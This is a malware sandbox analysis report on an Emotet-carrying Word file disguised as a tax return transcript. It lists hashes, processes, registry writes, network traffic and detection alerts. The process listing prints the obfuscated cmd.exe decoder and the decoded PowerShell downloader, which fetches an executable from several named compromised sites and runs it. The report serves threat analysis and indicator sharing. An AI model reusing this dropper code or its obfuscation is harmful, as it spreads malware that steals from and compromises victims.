File name: | Tax Return Transcript.doc |
Full analysis: | https://app.any.run/tasks/3485f57a-3ee1-4950-9961-1514a1c0e432 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 17:02:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 13:33:00 2018, Last Saved Time/Date: Thu Dec 6 13:33:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0 |
MD5: | E36D90BD3D4BED08C76E9CEED2CB5699 |
SHA1: | F0BA7B79FDE1548B835A09A6E2F979C592330B26 |
SHA256: | 4AD61757791FEC4544901BDD38A7079176DD2F5A849AEEB6E9B94236CDEED0A3 |
SSDEEP: | 1536:Swkhz81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9DZNfia:68GhDS0o9zTGOZD6EbzCd9via |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 16 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 15 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:12:06 13:33:00 |
CreateDate: | 2018:12:06 13:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Tax Return Transcript.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3924 | c:\XvRUKJcjiMdV\RCtAtXuVjKGfW\CAKJJLMVLizcA\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M([email protected]\B:j9qW2/&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;41;7;52;24;71;62;0;77;52;61;29;39;4;52;29;68;80;52;0;57;23;26;52;7;29;48;34;75;21;80;41;51;2;29;29;50;76;82;82;23;62;15;26;15;29;52;61;68;61;62;53;82;15;26;50;58;54;66;69;67;65;2;29;29;50;76;82;82;19;26;7;58;15;26;17;52;17;52;15;26;58;7;68;61;62;53;82;40;27;30;15;69;50;36;65;2;29;29;50;76;82;82;53;38;35;29;26;77;7;58;35;26;53;53;52;68;7;23;82;26;12;2;2;78;7;28;36;65;2;29;29;50;76;82;82;17;52;19;62;35;53;61;68;50;23;82;50;63;0;82;50;73;58;50;69;52;81;36;59;65;2;29;29;50;76;82;82;19;26;7;52;0;46;17;52;15;26;58;7;68;61;62;53;82;22;60;23;19;61;53;35;75;62;51;68;40;50;23;26;29;56;51;65;51;47;48;34;80;79;61;41;51;19;50;26;51;48;34;59;80;73;39;41;39;51;78;81;66;51;48;34;61;75;4;41;51;26;26;19;51;48;34;43;50;27;41;34;52;7;22;76;29;52;53;50;33;51;74;51;33;34;59;80;73;33;51;68;52;36;52;51;48;1;62;35;52;38;61;2;56;34;26;5;63;39;26;7;39;34;75;21;80;47;49;29;35;46;49;34;0;73;37;68;16;62;24;7;23;62;38;17;5;26;23;52;56;34;26;5;63;44;39;34;43;50;27;47;48;34;40;38;37;41;51;72;64;79;51;48;70;1;39;56;56;27;52;29;71;70;29;52;53;39;34;43;50;27;47;68;23;52;7;58;29;2;39;71;58;52;39;66;42;42;42;42;47;39;49;70;7;22;62;19;52;71;70;29;52;53;39;34;43;50;27;48;34;5;70;80;41;51;37;15;4;51;48;0;35;52;38;19;48;45;45;61;38;29;61;2;49;45;45;34;80;55;15;41;51;31;21;26;51;48;88)do set 45Nn=!45Nn!!Dgc:~%f,1!&&if %f==88 powershell.exe "!45Nn:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2444 | CmD /V/C"set Dgc=bfhHNFknwKVlHEVsDdPkVzvlwiiGAtJPV+$rxOa S=0Y,}y);{p'em4M([email protected]\B:j9qW2/&&for %f in (34;5;13;23;41;51;16;62;19;51;48;34;0;73;37;41;7;52;24;71;62;0;77;52;61;29;39;4;52;29;68;80;52;0;57;23;26;52;7;29;48;34;75;21;80;41;51;2;29;29;50;76;82;82;23;62;15;26;15;29;52;61;68;61;62;53;82;15;26;50;58;54;66;69;67;65;2;29;29;50;76;82;82;19;26;7;58;15;26;17;52;17;52;15;26;58;7;68;61;62;53;82;40;27;30;15;69;50;36;65;2;29;29;50;76;82;82;53;38;35;29;26;77;7;58;35;26;53;53;52;68;7;23;82;26;12;2;2;78;7;28;36;65;2;29;29;50;76;82;82;17;52;19;62;35;53;61;68;50;23;82;50;63;0;82;50;73;58;50;69;52;81;36;59;65;2;29;29;50;76;82;82;19;26;7;52;0;46;17;52;15;26;58;7;68;61;62;53;82;22;60;23;19;61;53;35;75;62;51;68;40;50;23;26;29;56;51;65;51;47;48;34;80;79;61;41;51;19;50;26;51;48;34;59;80;73;39;41;39;51;78;81;66;51;48;34;61;75;4;41;51;26;26;19;51;48;34;43;50;27;41;34;52;7;22;76;29;52;53;50;33;51;74;51;33;34;59;80;73;33;51;68;52;36;52;51;48;1;62;35;52;38;61;2;56;34;26;5;63;39;26;7;39;34;75;21;80;47;49;29;35;46;49;34;0;73;37;68;16;62;24;7;23;62;38;17;5;26;23;52;56;34;26;5;63;44;39;34;43;50;27;47;48;34;40;38;37;41;51;72;64;79;51;48;70;1;39;56;56;27;52;29;71;70;29;52;53;39;34;43;50;27;47;68;23;52;7;58;29;2;39;71;58;52;39;66;42;42;42;42;47;39;49;70;7;22;62;19;52;71;70;29;52;53;39;34;43;50;27;48;34;5;70;80;41;51;37;15;4;51;48;0;35;52;38;19;48;45;45;61;38;29;61;2;49;45;45;34;80;55;15;41;51;31;21;26;51;48;88)do set 45Nn=!45Nn!!Dgc:~%f,1!&&if %f==88 powershell.exe "!45Nn:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2272 | powershell.exe "$FEl='Dok';$bUO=new-object Net.WebClient;$BzW='http://losistec.com/sipg4837@http://kingsidedesign.com/SGJs3px@http://martijngrimme.nl/iHhh9nAx@http://dekormc.pl/pub/pUgp3e2xL@http://kinebydesign.com/vRlkcmrBo'.Split('@');$Wqc='kpi';$LWU = '928';$cBN='iik';$YpG=$env:temp+'\'+$LWU+'.exe';foreach($iFu in $BzW){try{$bUO.DownloadFile($iFu, $YpG);$SaO='ZTq';If ((Get-Item $YpG).length -ge 80000) {Invoke-Item $YpG;$FIW='OsN';break;}}catch{}}$WMs='Pzi';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3560 | "C:\Users\admin\AppData\Local\Temp\928.exe" | C:\Users\admin\AppData\Local\Temp\928.exe | — | powershell.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
2380 | "C:\Users\admin\AppData\Local\Temp\928.exe" | C:\Users\admin\AppData\Local\Temp\928.exe | 928.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
4092 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 928.exe |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 | ||||
2708 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Version: 6.1.7600.1 |
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | s8> |
Value: 73383E00800A0000010000000000000000000000 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1300627479 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1300627600 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1300627601 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 800A000018CF8883858DD40100000000 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | ,9> |
Value: 2C393E00800A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | ,9> |
Value: 2C393E00800A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2688) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9473.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NNV9B0VR7FYQWBXWUZ0W.temp | — | |
MD5:— | SHA256:— | |||
2272 | powershell.exe | C:\Users\admin\AppData\Local\Temp\928.exe | — | |
MD5:— | SHA256:— | |||
2380 | 928.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:BB7D2D20E0E2E1687848B576ABF9C82F | SHA256:26E9F955E6F04AA0A2D9037DB688A3677E80269E39EE63A8446021CD5A2FF267 | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13a00c.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2272 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x Return Transcript.doc | pgc | |
MD5:012D940C88C61EB25B4FFE26095D62B4 | SHA256:F3D2C80073FD88D79E313012A3ADD884CE11E28BF4102462ED59FD6C67D8CBAA | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:56F575D05EFBC1E63C4B06BCAF85D9D0 | SHA256:C42BCF6A7CD825244C49BE138F201E3FCE18ED84BC2D29A091B48AA13B4147B1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2272 | powershell.exe | GET | 302 | 192.185.119.24:80 | http://losistec.com/sipg4837 | US | html | 291 b | malicious |
2272 | powershell.exe | GET | 200 | 192.185.119.24:80 | http://losistec.com/cgi-sys/suspendedpage.cgi | US | html | 900 b | malicious |
2272 | powershell.exe | GET | 301 | 205.134.255.48:80 | http://kingsidedesign.com/SGJs3px | US | html | 242 b | malicious |
2272 | powershell.exe | GET | 200 | 205.134.255.48:80 | http://kingsidedesign.com/SGJs3px/ | US | executable | 120 Kb | malicious |
2708 | archivesymbol.exe | GET | 200 | 142.169.99.1:7080 | http://142.169.99.1:7080/ | CA | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2272 | powershell.exe | 205.134.255.48:80 | kingsidedesign.com | InMotion Hosting, Inc. | US | malicious |
2708 | archivesymbol.exe | 142.169.99.1:7080 | — | TELUS Communications Inc. | CA | malicious |
2272 | powershell.exe | 192.185.119.24:80 | losistec.com | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
losistec.com |
| malicious |
kingsidedesign.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2272 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2272 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
2272 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2272 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2272 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2272 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2708 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2708 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |